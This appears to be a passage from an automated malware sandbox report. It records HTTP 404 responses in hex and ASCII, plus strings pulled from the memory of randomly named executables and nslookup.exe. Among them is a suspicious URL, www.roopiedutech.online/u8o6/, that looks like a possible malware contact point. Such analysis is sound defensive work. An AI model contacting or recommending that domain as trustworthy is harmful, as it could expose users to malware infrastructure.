65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:27:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:27:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:27:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:27:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 04:28:17 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66925419-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 04:28:19 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66925419-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 04:28:22 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66925419-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 04:28:25 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66925419-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:28:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gk5VFA9U3LdLxcjdBC7FIJ9mTKel7tIICXFJztm1v%2BM5sGnZBxNtVXVUiFhpljjSSeFkXQyUPqRdFWR0MOi%2BcVDcWsOmZJxBcn7NwLaqRn6PuxbCBg8egOQTPjY0f7xSufEd84%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc160da7b022ca9-DFWContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1085&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=692&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 a0 4d 8a 85 58 83 4d 0e 1e 53 f7 e9 06 6a 36 ee be 34 f8 ef 25 29 82 d7 99 6f 86 19 ba ca 5f 36 f5 5b 55 c0 53 fd 5c 42 d5 3c 96 bb 0d ac 6e 11 77 45 bd 45 cc eb fc e2 a4 3a 41 2c f6 2b a3 c8 c9 d7 c9 90 e3 d6 1a 45 d2 c9 89 4d 96 64 b0 f7 02 5b 3f f6 96 f0 22 2a c2 05 a2 a3 b7 3f 73 6e 6d fe 31 6e 6d 14 0d a6 76 0c 81 bf 47 8e c2 16 9a d7 12 a6 36 42 ef 05 3e 66 0e 7c 0f e2 ba 08 91 c3 99 83 26 1c e6 a6 60 14 b5 d6 06 8e d1 3c 0c ed bb 63 4c 75 a6 ef 52 b8 6e 8e 63 2f e3 0d 1c 96 00 b4 02 d3 34 e9 21 74 96 3f 83 3f b3 ee 59 a0 f2 41 e0 3e 21 fc 2b 51 84 cb 4a c2 e5 dd 2f 00 00 00 ff ff e3 02 00 29 44 9b 03 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LAK@+=}iMXMSj64%)o_6[US\B<nwEE:A,+EMd[?"*?snm1nmvG6B>f\|&`<cLuRnc/4!t??YA>!+QJ/)D0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:28:34 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LB%2Fzw5zl2%2BoA%2F%2Fd%2FYh1az8B5I01OBgwc085cIYjyhMSp0ZXaHIbH%2BP53%2FEb24zunVIjzzWI%2FIQT%2F5vVApMzmOfBO%2FGrILaAEwQovQrJuiiB4TjTt4llEhWTmOCwKkB0NInEgxfY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc160ea7b87e7e3-DFWContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 a0 4d 8a 85 58 83 4d 0e 1e 53 f7 e9 06 6a 36 ee be 34 f8 ef 25 29 82 d7 99 6f 86 19 ba ca 5f 36 f5 5b 55 c0 53 fd 5c 42 d5 3c 96 bb 0d ac 6e 11 77 45 bd 45 cc eb fc e2 a4 3a 41 2c f6 2b a3 c8 c9 d7 c9 90 e3 d6 1a 45 d2 c9 89 4d 96 64 b0 f7 02 5b 3f f6 96 f0 22 2a c2 05 a2 a3 b7 3f 73 6e 6d fe 31 6e 6d 14 0d a6 76 0c 81 bf 47 8e c2 16 9a d7 12 a6 36 42 ef 05 3e 66 0e 7c 0f e2 ba 08 91 c3 99 83 26 1c e6 a6 60 14 b5 d6 06 8e d1 3c 0c ed bb 63 4c 75 a6 ef 52 b8 6e 8e 63 2f e3 0d 1c 96 00 b4 02 d3 34 e9 21 74 96 3f 83 3f b3 ee 59 a0 f2 41 e0 3e 21 fc 2b 51 84 cb 4a c2 e5 dd 2f 00 00 00 ff ff e3 02 00 29 44 9b 03 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LAK@+=}iMXMSj64%)o_6[US\B<nwEE:A,+EMd[?"*?snm1nmvG6B>f\|&`<cLuRnc/4!t??YA>!+QJ/)D0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:28:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2B%2BSa68x0UE%2B7mVggd0mn%2BXS4dcaG3yur8kfLAzoyO8t%2FycK32Jk3vdXjgGvyAgE%2BDQdiiEvvl1rNKZuLaS%2FPi2AIMGKNNYQ4IQ5jRLwZfJ%2BDSyXy8zpnT9SUDpKcFPOeNl7cr4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc160fa4d322c9c-DFWContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1665&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10794&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 a0 4d 8a 85 58 83 4d 0e 1e 53 f7 e9 06 6a 36 ee be 34 f8 ef 25 29 82 d7 99 6f 86 19 ba ca 5f 36 f5 5b 55 c0 53 fd 5c 42 d5 3c 96 bb 0d ac 6e 11 77 45 bd 45 cc eb fc e2 a4 3a 41 2c f6 2b a3 c8 c9 d7 c9 90 e3 d6 1a 45 d2 c9 89 4d 96 64 b0 f7 02 5b 3f f6 96 f0 22 2a c2 05 a2 a3 b7 3f 73 6e 6d fe 31 6e 6d 14 0d a6 76 0c 81 bf 47 8e c2 16 9a d7 12 a6 36 42 ef 05 3e 66 0e 7c 0f e2 ba 08 91 c3 99 83 26 1c e6 a6 60 14 b5 d6 06 8e d1 3c 0c ed bb 63 4c 75 a6 ef 52 b8 6e 8e 63 2f e3 0d 1c 96 00 b4 02 d3 34 e9 21 74 96 3f 83 3f b3 ee 59 a0 f2 41 e0 3e 21 fc 2b 51 84 cb 4a c2 e5 dd 2f 00 00 00 ff ff e3 02 00 29 44 9b 03 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LAK@+=}iMXMSj64%)o_6[US\B<nwEE:A,+EMd[?"*?snm1nmvG6B>f\|&`<cLuRnc/4!t??YA>!+QJ/)D0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 04:28:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B3bajX7CjaCeYITsG5Msss%2F4sb6tLdF6lwKgfSKnOOSv7fsN%2B5VF6MG2XtctP9kGj8HkyUGdpAWP5be3YOh5shwxa0OrCUSyL9VZMYWVZv52jf%2F6BKWVjqbQsLrxb2buZLtGPSQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc1610a3c10b78f-DFWalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=435&delivery_rate=0&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 72 69 64 65 67 72 6f 76 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.pridegrove.net Port 80</address></body></html>0

Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004C92000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000004032000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://fedoraproject.org/
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004C92000.00000004.10000000.00040000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.0000000004032000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://nginx.net/
Source: A4mmSHCUi2.exe, 00000000.00000002.1669584077.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: A4mmSHCUi2.exe, 00000000.00000002.1680406253.0000000006C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wioTZtEQwu.exe, 0000000C.00000002.4110076229.0000000005621000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.roopiedutech.online
Source: wioTZtEQwu.exe, 0000000C.00000002.4110076229.0000000005621000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.roopiedutech.online/u8o6/
